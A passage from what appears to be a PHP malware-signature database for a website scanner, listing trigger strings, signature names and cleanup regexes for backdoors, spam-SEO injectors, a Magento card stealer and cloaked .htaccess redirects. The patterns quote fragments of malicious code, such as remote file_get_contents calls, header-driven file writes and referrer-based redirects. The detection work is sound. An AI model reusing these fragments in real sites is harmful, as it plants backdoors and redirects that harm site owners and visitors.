			'file_get_contents("http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.242', 'if\s*\(\s*\@?strpos\(\$_SERVER\[\s*[\'"]\s*REQUEST_URI\s*[\'"]\s*\]\s*,\s*[\'"]\.(html|htm|php)[\'"]\s*\)\)\s*{\s*(\$\w+)\s*=\s*str_replace\([\'"]\.html[\'"]\s*,\s*[\'"]{2}\s*,\s*\$_SERVER\[\s*[\'"]\s*REQUEST_URI\s*[\'"]\s*\]\s*\);\s*\2\s*=\s*str_replace\([\'"]\/[\'"],\s*[\'"]\s*[\'"],\s*\2\s*\);\s*echo\s*\@?file_get_contents\([\'"]http[^\2]+\2\);(?:\s*exit\(\);)?\s*}'),
		),
	),

	'if (!isset($_SERVER[\'REQUEST_URI\']) || ltrim($_SERVER[\'REQUEST_URI' => array(STR_TRIGGER,
		'print \'<div class=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.008', 'if[\s]*\(!isset\(\$_SERVER\[.REQUEST_URI.\]\) \|\| ltrim\(\$_SERVER\[.REQUEST_URI[^{]+\{\s*print\s*.<div\s*class=[^}]+div>.;[\s]*}'),
	),

	'$this->prepareDir($mimeDesc);' => array(STR_TRIGGER,
		'$pattern=\'$%s=%s($%s)\';' => array(STR_CLEARFILE, 'php.spam-seo.redirect.084', NULL),
	),

	'function wp_initialize_the_theme_load()' => array(STR_TRIGGER,
		'$f = dirname(__file__) . "/footer.php";' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.spam-link-check.001', 'else\s*\{\s*\$l\s*=\s*\'[^\']+\';\s*\$f\s*=\s*dirname.__file__.\s*\.\W+footer.php[^\{]+\{\s*wp_initialize_the_theme_message..;\s*die;\s*\}\s*\}'),
	),

	'botnet' => array(STR_TRIGGER,
		'mysqlQueryEx(\'botnet_list\'' => array(STR_CLEARFILE, 'dir.hacktool.citadel_botnet.001', NULL),
	),

	'pstMtd' => array(STR_TRIGGER,
		'google.com")){wp_redirect(base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.pstmtd-redirect.001', 'function pstMtd\(\$\w\)\{.\w=.\w;[^\.]+?\.\w+\{[^\.]+?\.com....wp_redirect.base64[^\}]+?\}\}\}[^\}]+?mobile_redirect..;\}'),
	),

	'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){' => array(STR_TRIGGER,
		'echo file_get_contents("http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.068.02', '<\?(?:php)?\s*if\(preg_match\([^\2]+google[^\/]+\/i[\'"]\s*,\s*\$_SERVER\[.HTTP_USER_AGENT.\]\s*\)\s*\)\s*{\s*(?:echo|eval)\s*file_get_contents\(.https?:\/\/[^\)]+\)\s*;\s*}\s*\?>'),
	),

	'if($_SERVER[HTTP_ACCEPT_CHARSET]==' => array(STR_TRIGGER,
		'extract($_SERVER);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.extract.003', 'if\(\$_SERVER\[HTTP_ACCEPT_CHARSET\]==[^;]+extract\(\$_SERVER[^}]+array_filter[^;]+;[\s]*}'),
	),

	'$ingredients=file(dirname(__FILE__).\'/ingredients.txt\');' => array(STR_CLEARFILE, 'php.malware.generic.041' ,NULL), //Adding an alert in the report since the directory name is random but the files arent.
	'if(count($_GET)>0){$c_=0;$c0=explode(\'&\',$_SERVER[\'QUERY_STRING\']);if(preg_match' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.026', 'if\(count\(\$_GET\)>0\)..c_=0;[^;]+SERVER..QUERY[^\n]+c6=..;include[^;]+;exit.0.;..;'),
	'=false;mkdir(\'cms\');touch(\'cms\',mktime' => array(STR_CLEARFILE, 'php.malware.injector.025', NULL),
	'break;}}}}if($c_==1){unset($_GET[$c1]);$c4=false;$c5=\'\';$c6=\'\';include \'' => array(STR_CLEARFILE, 'php.malware.injector.024', NULL),
	'getLinks(\'on\',$LinksDataForXmlCache[links]' => array(STR_CLEARFILE, 'php.spam-seo.links_cache_xml.001', NULL), 
	'$dw = str_replace("##RATING_COUNT##", $rating_count, $dw);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.pornspam.002', 'if.stristr.._SERVER..REQUEST_URI.., .\/\w+\/.\)\) \{\s*[^\}\{]+?if.stristr..keyword, "\?"\)\) \{[^\{<]+?.handle = \@fopen..path."site.dat", "r".;.+?echo \$dw;\s*exit..;\s*\}'),
	'define(\'HDDD467FFEY322\', 1);}/*' => array(STR_CLEAR_MULTIMATCH, 'js.blackhole.generic.003', '<.php \/\*\w\w\w\w\w\w\w\w\w\w+\*\/if .*HDDD467FFEY322.*define..HDDD467FFEY322., 1\);}\/\*\w\w\w\w\w\w\w\w\w\w+\*\/ .>'),
	'<?php @preg_replace($_SERVER[' => array(STR_CLEAR_LINEMATCH,'php.backdoor.pregreplace.016', '@preg_replace.._SERVER\\[[^)]+\\);'),
	'$countNesting = strlen($url) % 2;' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.pornspam.004', 'echo .<!--System_required_label-->.;[\\s]*\\$url = \\$_SERVER..HTTP_HOST..;[\\s]*\\$countNesting = strlen..url[^?]+echo .<h1 id=\"bottom[^\']+<.h1>\''),
	'file_put_contents("ips.txt", @file_get_contents("ips.txt")' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.075', 'function GET\(\$ln\)[\s]*\{\$[\w]+[\s]*=[\s]*curl_init[^@]+@file_(get|put)_contents\(.ips\.txt[^~]+}(?=[\s]*\?>)'),
	'saiforaviado_ip' => array(STR_CLEARFILE, 'php.malware.hostlog.001', NULL),
	'$url = \'http://\'.$dom[mt_rand(0,sizeof($dom)-1)].' => array(STR_CLEARFILE, 'php.spam-seo.redirect.064', NULL),
	'\'info\' => base64_encode($dvs),' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.055.02', 'if\s*?\((?:count|sizeof)\s*?\(\$_POST\s*?\)(?:[^;]+?;){4,10}?\s*?file_get_contents[^;]+?;\s*?\}(?:\s*?function(?:[^\}]+?\}){3,6}?\}\s*?return\s+?implode[^\}]+?\})?'),
	'if (substr($url, 0, 4) == "<!--") {echo $url;}' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.231', '\$\w+\s*=\s*array\([\'"]\d+\.\d+\.\d+[\'"],\s*[\'"]\d+\.\d+\.\d+[\'"],[^;]+;\s*\$\w+\s*=\s*explode\([\'"]\.[\'"],\s*\$_SERVER\[.REMOTE_ADDR.\]\);\s*\$\w+\s*=\s*\$\w+\[\d+\]\.[\'"]\.[\'"][^\!]+\!strstr\(\$_SERVER\[.REQUEST_URI.\][^{]+{if\s*\(function_exists\(.curl_exec.\)\)\s*{\$\w+\s*=\s*curl_init\([^;]+;\s*curl_setopt\(\$\w+,\s*CURLOPT[^=]+=\s*trim\(curl_exec\(\$\w+\)\);\s*if\s*\(substr\(\$\w+,\s*\d+,\s*\d+\)\s*==\s*[\'"]<\!--[\'"]\)\s*{echo\s*\$\w+;}}}'),
	'wp_remote_request( "http://".$_SERVER[\'HTTP_HOST\']."/gd-config.php", array(' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.varnish_bypass.001', 'if\s*\(\s*function_exists\(.wp_remote_request.\)\)\s*{\s*wp_remote_request\(\s*[\'"]https?:\/\/[\'"]\.\$_SERVER\[.HTTP_HOST.\]\.[\'"]\/gd-config\.php[\'"],\s*array\(\s*[\'"]method[\'"]\s*=>\s*[\'"]BAN[\'"],\s*[\'"]headers[\'"]\s*=>\s*array\(\s*[\'"]Host[\'"]\s*=>\s*\$_SERVER\[.HTTP_HOST.\]\s*\)\s*\)\s*\);\s*}'),
	'file_put_contents(@$_SERVER[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.030', 'if\s*\(\@?\$_SERVER\[.HTTP\w+.\]\s*\)\s*{\s*echo\s[\'"]\w+[\'"]\s*;\s*if\s*\(\@?\$_SERVER\[.HTTP_X_TO.\]\)\s*{\s*file_put_contents\(\@?\$_SERVER\[.HTTP_X_TO.\]\s*,\s*\@?\$_SERVER\[.HTTP_X_DATA.\]\)\s*;\s*}\s*}'),
	'"ourtime.php?$host"' => array(STR_CLEARFILE, 'php.phishing.ourtime.001', NULL),
	'("#/\*\*(.*)\*\*/#se",implode' => array(STR_CLEARFILE, 'php.backdoor.create_function.023', NULL),
),

'Rewrite' => array(STR_TRIGGER,

	'RewriteRule' => array(STR_TRIGGER,

		'RewriteRule ^' => array(STR_TRIGGER,

			'.php$ - [L]' => array(STR_TRIGGER,

				'.php?q=$' => array(STR_TRIGGER,

					'RewriteRule \^[^\s]+\(\.\*\)\$[\s]*[^\.]+\.php\?q=\$1[\s]*\[L\]' => array(REX_TRIGGER,

						'RewriteCond %\{REQUEST_FILENAME\}[^\n]+[\s]*RewriteRule \^[^\s]+\(\.\*\)\$[\s]*[^\.]+\.php\?q=\$1[\s]*\[L\]' => array(REX_TRIGGER,
							'.php?q=' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.015', '<IfModule mod_rewrite.c>[\s]*RewriteEngine on[\s]*RewriteCond %\{REQUEST_FILENAME\} !-f[\s]*RewriteCond %\{REQUEST_FILENAME\} !-d[\s]*RewriteRule \^[^\s]+\(\.\*\)\$[\s]*[^\.]+\.php\?q=\$1[\s]*\[L\][\s]*<.IfModule>'),
						),

						'php?q=$' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.015.02', 'RewriteRule \^[^\s]+\(\.\*\)\$[\s]*[^\.]+\.php\?q=\$1[\s]*\[L\]'),
					),

					'RewriteRule (.*' => array(STR_TRIGGER,
						'.*) /' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.003', '<IfModule mod_rewrite.c>[\s]*RewriteEngine On[\s]*RewriteCond %\{REQUEST_FILENAME\} !-f[\s]*RewriteCond %\{REQUEST_FILENAME\} !-d[\s]*RewriteRule \(\.\*[\w]{3,10}\.\*\) [^?]+\?q=\$[\d]+[\s]*\[L\][\s]*RewriteRule \^[^$]+php\$[\s]*-[\s]*\[L][\s]*<.IfModule>'),
					),
				),

				'&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
					'(.*)--(' => array(STR_TRIGGER,
						'RewriteRule \^[^\*\n]*\(\.\*\)--\([\w]+\)[^\$]+\(\.\*\)\$[\s]*\?[\w]+\$[\d]+=\$[\d]+&%\{QUERY_STRING\}\[L\]' => array(REX_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.043', 'RewriteRule \^[^\*\n]*\(\.\*\)--\([\w]+\)[^\$]+\(\.\*\)\$[\s]*\?[\w]+\$[\d]+=\$[\d]+&%\{QUERY_STRING\}\[L\]'),
					),
				),

				')([0-9]+)\/nsx([0-9]+)\/(.*)$ ?' => array(STR_TRIGGER,
					'RewriteRule ^\/(.*)(' => array(STR_TRIGGER,
						'\$[\d]=\$[\d]&%\{QUERY_STRING\}\[L\]' => array(REX_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.024', 'RewriteRule \^..\(\.\*\)\([\w]+\)\(\[0-9\]\+\)..nsx[^\}]+\{QUERY_STRING\}\[L\]'),
					),
				),

				'RewriteCond %{REQUEST_URI} !(\.css|\.js|\.png|\.jpg|\.gif|robots\.txt|\.tmps|\.php|\.txt|\.html)$ [NC]' => array(STR_TRIGGER,
					'/(.*)$ wp-content/plugins/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.016', 'RewriteCond \%\{REQUEST_URI\} !\(..css...js...png...jpg...gif.robots..txt[^\]]+\][\s]*RewriteCond[^\^]+(RewriteRule[\s]*\^[\w_-]+.\(\.\*\)\$ wp-content.plugins[^\]]+\][\s]*){2,}'),
				),

				'?$3$1=$2&%{QUERY_STRING}' => array(STR_TRIGGER,
					'.*P.*L.*-.*J.*PH' => array(STR_CLEAR_LINEMATCH, 'htaccess.malware.generic.010', 'RewriteRule\s*\^\.\*\.\.\*..\.\*\-\.\*\-\.\*_\(\[0-9\]\+\)_[^\$]+\$\s\?\$\d\$\d=\$\d[^}]+}\[L\]'),
				),

				'?$1$2=$3&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
					'RewriteRule ^.*([^\d\/]+)\/([0-9]+)-([0-9]+)\/(.*)-.*\/.*.' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.019', 'RewriteRule \^\.\*\(\[\^.d..\]\+\)..\(\[0-9\]\+\)-\(\[0-9\]\+\)..\(\.\*\)-\.\*..\.\*\.\.[^\[]+\$1\$2=\$3\&%\{QUERY_STRING\}\[L\]'),
				),

				'.php?key=$1 [L]' => array(STR_TRIGGER,
					'RewriteRule ^wp\-content/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.047', 'RewriteRule \^\(\.\+\)\.html\$[^\?]+\?key=\$1 \[L\][\s]*(RewriteRule[^\n]+\.php[\s]*\n)+'),
				),

				'?degasify$3=$1&%{QUERY_STRING}[L]' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.021', 'RewriteRule \^\(\[0-9\].....degasify\)[^{]+\?degasify\$3=\$1&%\{QUERY_STRING\}\[L\]'),
				'RewriteRule ^(.+).html$ wp-content/languages/img/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.023', 'RewriteRule \^\(\.\+\)\.html\$ wp-content.languages.img.[^\n]+\.php\?[\w]+=\$[\d]+'),
				'RewriteRule ^hot/(\w+)i\d+\.do$ /wp-content/plugins/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.034', '<IfModule mod_rewrite.c>[\s]*RewriteEngine On[\s]*(Rewrite(Cond|Rule|Base)[^\n]+\s*|#[^\n]*\s*)+\^hot.\(.w\+\)i.d...do...wp-content.plugins[^\n]+[\s]*(Rewrite(Cond|Rule|Base)[^\n]+\s*|#[^\n]*\s*)+<.IfModule>'),
				'RewriteRule ^(cram|exam|prep|notes|pdf|site)-(.*)' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.039', '<IfModule mod_rewrite.c>[\s]*RewriteEngine On[\s]*RewriteRule ..cram.exam.prep[^\n]+\][\s]*<.IfModule>'),
				'RewriteRule ^(.*)--(devata)([0-9' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.042', 'RewriteRule \^\(\.\*\)--\(devata\)\(\[0-9[^\n]+L\]'),
				'RewriteRule . /indeeex.php [L]' => array(STR_CLEARFILE, 'htaccess.spam-seo.redirect.046', NULL),
			),

			'RewriteRule ^(.*)$ http://' => array(STR_TRIGGER,

				'####GET####' => array(STR_TRIGGER,
					'RewriteRule \.(jpg|png|gif|jpeg|bmp)$ - [L]' => array(STR_TRIGGER,
						'RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.032', '#+GET#+[\s]*RewriteEngine [oO]n[\s]*RewriteRule ...jpg.png[^\]]+\][\s]*(RewriteCond %\{HTTP_[^\]]+\][\s]*){10}[^:]+RewriteRule \^\(\.\*\)\$[\s]*http[^\]]+\]'),
					),
				),

				'%{ENV:REDIRECT_STATUS}' => array(STR_TRIGGER,
					'RewriteCond\s*\%{HTTP_REFERER}\s*\([\|\s*googleyahoomsnaolbing]+\)' => array(REX_CLEAR_MULTIMATCH,  'htaccess.spam-seo.redirect.013', 'RewriteEngine\s*[Oo]n\s*RewriteCond\s*\%{ENV:REDIRECT_STATUS}\s*200\s*RewriteRule\s*\^\s*-\s*\[L\]\s*RewriteCond\s*\%{HTTP_REFERER}\s*\([\|\s*googleyahoomsnaolbing]+\)\s*RewriteRule\s*\^\(\.\*\)\$\s*http:[^\[]+\[L\]'),
				),

				'RewriteCond %{HTTP_REFERER} .*mail* [OR]' => array(STR_TRIGGER,
					'RewriteCond %{HTTP_REFERER} .*inbox*' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.006', '(?:\s{30}|\t{5})?<IfModule mod_rewrite.c>[^%]+(?:RewriteCond %{HTTP_REFERER} \.\*(mail|imap|spam|inbox)\.?\* \[OR\])+[^<]+<.IfModule>'),
				),

				'="RewriteCond %{HTTP_USER_AGENT} Googlebot' => array(STR_TRIGGER,
					'file_get_contents($file_pointer);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.118', NULL),
				),

				'.php(.*) http:' => array(STR_TRIGGER,
					'RewriteCond %{HTTP_USER_AGENT} (.*Googlebot.*|.*Yahoo!' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.048', 'RewriteCond %\{HTTP_USER_AGENT\} \(\.\*Googlebot[^\n]+[\s]*(RewriteRule[^\n]+\[L,R=301][\s]*)+RewriteRule \^[\w]+\(\.\*\)[^\[]+QUERY_STRING\}[\s]*\[L\][\s]*'),
				),

				'text/vnd.wap.wml|application/vnd.wap.xhtml\+xml' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.036', 'RewriteEngine\s*On\s*RewriteCond\s*%\{HTTP:X-Wap-Profile\}[^\]]+\]\s*[^\^]+\^\.\+\$[^\(]+\(text.vnd\.wap\.wml\|application.vnd\.wap\.xhtml.\+xml[^"]+\"blackberry.opera.mini.vantgo[^"]+".\[NC,OR\][^\}]+\}\s*\(android.iphone.ipod.ipad\)\s*\[NC\][^\!]+\!\(accoona[^\)]+\)\s*\[NC\]\s*RewriteCond\s%\{[^\(]+\(jpg.gif.png.jpeg.bmp[^\(]+\(\.\*\)\$\s*[htps]{4,}:[^\[]+\[L,R=302\]'),
				'RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.013.06', 'RewriteEngine\s*on\s*RewriteCond\s*%\{HTTP_USER_AGENT\}\s*android\s*\[NC,OR\]\s*RewriteCond\s*%\{HTTP_USER_AGENT\}\s*opera.\s*mini\s*\[NC,OR\]\s*(?:RewriteCond %\{HTTP_USER_AGENT\} [^\[]+\[NC,OR\]\s*)+RewriteCond %\{HTTP:Accept\}[^\%]+%{HTTP:Profile}[^%]+%\{HTTP:Wap-Profile\}[^\$]+\$\s*\[NC\]\s*RewriteCond\s*%\{HTTP_USER_AGENT\}\s*!\(windows.\.nt\|bsd\|x11\|unix\|macos\|macintosh\|playstation\|google\|yandex[^\)]+\)\s*\[NC\]([\s]*RewriteCond[^\]]+\])?[\s]*RewriteRule\s*\^\(\.\*\)\$\s*http[^\[]+\[L,R=302]'), //improved by PG to cover variants
				'RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.001.05', '(RewriteCond\s*\%.HTTP_USER_AGENT.[^\]]+]\n)+(RewriteCond\s*\%.HTTP:[^\]]+]\n)+(\n)*(RewriteCond\s*\%\{[^\]]+]\n)+(\n)*RewriteRule[^\]]+L,R=302\]'),
				'RewriteCond %{HTTP_REFERER} .*google.* [OR]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.005', 'RewriteEngine [Oo]n[\s]*(RewriteCond %\{HTTP_REFERER\}[^\n]+([\s]*\[OR\])?[\s]*){3,}RewriteRule[^]]+L\]'),
				'RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.004', '<IfModule mod_rewrite.c>(?:[^%]+RewriteCond %\{HTTP_REFERER\} +\^\.\*\((?:google|ask|yahoo|baidu|\||web|websuche|witch|wolong|online)+[^\$]+RewriteRule [^\]]+L\])+[^<]+<.IfModule>'),
				'RewriteCond %\{HTTP_USER_AGENT}[\s]*("A|(\.\*))ndroid[^(]+RewriteRule \^\(\.\*\)\$ http' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.014', 'RewriteEngine on[\s]*RewriteCond %\{HTTP_USER_AGENT}[\s]*[^\[]+ndroid[^(]+RewriteRule \^\(\.\*\)\$ http[^\s]+([\s]*\[[^\]]+\])?'),
				'RewriteCond %\{HTTP_REFERER\} \^\.\*\(([\w_-]+\|){40}[^\)]+ahoo\|[^\)]+\)[^\)]+\)' => array(REX_CLEAR_MULTIMATCH, 'rex.spam-seo.redirect.076', 'RewriteEngine On[\s]*RewriteCond %\{HTTP_REFERER\} \^\.\*\(([\w_-]+\|){40}[^\)]+ahoo\|[^\)]+\)[^\)]+\)[\s]*RewriteRule \^\(\.\*\)\$ http[^\]]+L\]'),
				'##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!##' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway-rewrite.007', '##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!##[\\r\\n]+RewriteEngine on[\\r\\n]+RewriteCond %\{HTTP_USER_AGENT\} acs \\[NC,OR\\][^\\$]+RewriteRule \\^\\(\\.\\*\\)\\$ http[^\\]]+\\[L,R=302\\][\\r\\n]+##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!##'),
				'USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.031', 'RewriteEngine on[\s]*(RewriteCond %\{[^\}]+\}[^\n]+[\s]*){5,}RewriteRule \^\(\.\*\)\$[\s]*http[^\]]+\]'),
			),

			'<IfModule mod_rewrite.c>' => array(STR_TRIGGER,

				'RewriteRule .* ' => array(STR_TRIGGER,
					'RewriteEngine\s+[Oo][Nn]\s+RewriteCond\s+%{HTTP:Accept-Language}\s*\(\w+\)\s+\[[^]]+?\]\s+RewriteRule \.\* ' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.037', 'RewriteEngine\s+[Oo][Nn]\s+RewriteCond\s+%{HTTP:Accept-Language}\s*\(\w+\)\s+\[[^]]+?\]\s+RewriteRule \.\* http[^\s]+?\s+\[[^]]+?\]'),
				),

				'.html$ index.php?web=' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect.017', 'RewriteRule\s*\^\(\[\w-\w\]\{\d\}\)_\(\[\w\-\w{2}-\w\]\{\d,\d\}\)_[^\.]+\.\w+\$\sindex\.php\?web=[^\[]+\[L\]'), 
				'$ /include.php?id=$1 [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.010', '(?:RewriteRule\s+\^[^\$]+?\$ \/include\.php\?id=\$1 \[L\]\s*)+'),
				'..*$ ?$2$4=$3&%{QUERY' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.doorway-rewrite.009', 'RewriteRule\s*\^[^\^]+\^.d..\]\+\)..\(\[\d.\d\]\+\)_[^\$]+\$\s*\?\$\d\$\d=[^{]+\{QUERY_STRING\}\[L\]'),
				'RewriteRule ^(.*)\/(gossaniferous)\/([0-9]+)_([0-9]+).cgi$' => array(STR_CLEARFILE, 'htaccess.malware.generic.014', NULL),
				'^.*[-/]n(\d+)-.*$ index\.php?id=$1&%{QUERY_STRING}' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.038', '<IfModule\smod_rewrite[^>]+>\s*Options\s*\+FollowSymLinks\s*RewriteEngine\s*[Oo]n\s*RewriteBase\s*\/\w+\s*RewriteRule\s*\^\.\*\[\-\/\]n\(.d\+\)\-\.\*\$\s*index\\\.php\?id=\$\d\&\%[^\[]+\[\w+\]\s*RewriteRule\s*\^n\(.d\+\)-\.\*\$\s*index\\\.php\?id=\$\d\&\%[^\[]+\[\w+\]\s*<\/IfModule>'),
			),

			'RewriteCond %{ENV:REDIRECT_STATUS} 200' => array(STR_TRIGGER,
				'RewriteCond %{HTTP_USER_AGENT} (' => array(STR_TRIGGER,
					'RewriteCond %{HTTP_REFERER} (' => array(STR_TRIGGER,
						'RewriteRule ^.*$' => array(STR_TRIGGER,
							'.php [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.009', 'RewriteEngine On\s+RewriteCond\s+%\{ENV:REDIRECT\w+\}\s+\d+\s+RewriteRule\s+\^\s+-\s+\[L\]\s+RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\([^\)]+?\)\s+\[OR\]\s+RewriteCond\s+%\{HTTP_REFERER\}\s+\([^\)]+?\)\s+RewriteRule \^\.\*\$[^\.]+?\.php \[L\]'),
						),
					),
				),
			),

			'RewriteCond %{HTTP_USER_AGENT} Googlebot [OR]' => array(STR_TRIGGER,
				'RewriteCond %{HTTP_REFERER} (yahoo|msn|aol|bing|google)' => array(STR_TRIGGER,
					'RewriteCond %{REQUEST_URI} !^.*\.(jpg|css|js|gif|png|css|js|xml)$ [NC]' => array(STR_TRIGGER,
						'RewriteRule ^(.*)$ ' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.040', '(RewriteEngine [Oo]n)?[\s]*RewriteCond %\{HTTP_USER_AGENT\}[\s]*(Googlebot|\(bing\|google[^\)]+\))[\s]*\[(NC,)?OR\][\s]*(RewriteCond %\{[^\n]+[\s]*)+RewriteRule \^\(\.\*[^\n]+\][\s]*'),
					),
				),
			),

			'^([A-Za-z0-9-]+).html$ http' => array(STR_TRIGGER,
				'^([A-Za-z0-9-]+).txt$ http' => array(STR_TRIGGER,
					'RewriteCond %{REQUEST_FILENAME}' => array(STR_TRIGGER,
						'RewriteRule . http' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.044', 'RewriteRule \^\(\[A-Za-z0-9-\]\+\)\.html\$ http[^\}]+REQUEST_FILENAME[^\[]+RewriteRule \. http[^\]]+L\][\s]*'),
					),
				),
			),

			'^GET$' => array(STR_TRIGGER,
				'!^.*(exactseek|Feed|Fetch|' => array(STR_TRIGGER,
					'^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.020', '<IfModule prefork\.c[^>]*>[\s]*RewriteEngine On[\s]*RewriteCond %\{REQUEST_METHOD\}[\s]+\^GET\$[\s]*RewriteCond %\{HTTP_REFERER\}[\s]+\^\(http.:[^\|]+tweet\|twit\|linkedin[^>]+RewriteRule \^[^:]+[\s]+http[^<]+<.IfModule>[\s]*(#[\w]{40,})?'),
				),
			),

			'RewriteCond %{REQUEST_URI} \.htm$' => array(STR_TRIGGER,
				'RewriteCond %{REQUEST_URI} !.+/.*' => array(STR_TRIGGER,
					'RewriteRule ^(.*)$ wp-content/uploads/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.037', '(RewriteCond %\{REQUEST_URI\}[^\n]+[\s]*)+RewriteRule .......wp-content.uploads[^\n]+\]'),
				),
			),

			'RewriteCond %{REQUEST_FILENAME} !-f' => array(STR_TRIGGER,
				'.xml(\.gz)?$' => array(STR_TRIGGER,
					'.php?name=$1&%{QUERY_STRING} [L]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.injector.047', 'RewriteCond %\{REQUEST_FILENAME\} !-f[\s]*RewriteRule \^[^\[]+php\?name=\$1&%\{QUERY_STRING\} \[L\][\s]*((#[\w]+[\s]*)+)?'),
				),
			),

			' ?$1$3=$4&%{QUERY_STRING}[L]' => array(STR_TRIGGER,
				')_.*_.*-.*' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect_gen.032', 'RewriteRule \^\(\[\^.d.\/\]\+\).\/\(\.\*\).\/\(\[0-9\]\+\)_\.\*_\.\*-\.\*.\/\(\[0-9\]\+\)-\(\.\*\).\/\$\s+?\?\$1\$3=\$4&%\{QUERY_STRING\}\[L\]\s*'),
			),

			'&%{QUERY_STRING} [L]' => array(STR_TRIGGER,
				'(RewriteRule \^[^\?]+\.php\?[\w]+=\$[^&\n]+&%\{QUERY_STRING\} \[L\][\s]*){2,}' => array(REX_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.003.08', '(RewriteRule \^[^\?]+\.php\?[\w]+=\$[^&\n]+&%\{QUERY_STRING\} \[L\][\s]*){2,}'),
			),

			'RewriteCond %{HTTP_REFERER} (google|facebook|twitter' => array(STR_CHAIN_TRIGGER,
				'RewriteCond %{REQUEST_URI} .____.  [NC]' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect.045', '<IfModule mod_rewrite\.c>[\s]*RewriteEngine On[\s]*RewriteCond[\s]*%\{HTTP_REFERER\}[\s]*\([^\]]+OR\][\s]*RewriteCond %\{REQUEST_URI\}[\s]*\.____\.[^>]+Module>[\s]*ErrorDocument 404 http[^\n]+[\s]*'),
			),

			'RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|snsbot)' => array(STR_TRIGGER,
				'RewriteRule ^index.php$ wp-content/' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.doorway.007', 'RewriteEngine On\s*?(?:(?:Rewrite(?:Cond|Base|Rule)\s+?[^\n]+?\n|RewriteCond %{HTTP_USER_AGENT} \(google\|yahoo\|msn\|aol\|bing\|snsbot\)\n)\s*?){2,10}RewriteRule \^index\.php\$ wp-content\/[^\[]+?\[L\]'),
			),

			'RewriteCond %{THE_REQUEST} ^[^/]*/index\.php [NC]' => array(STR_TRIGGER,
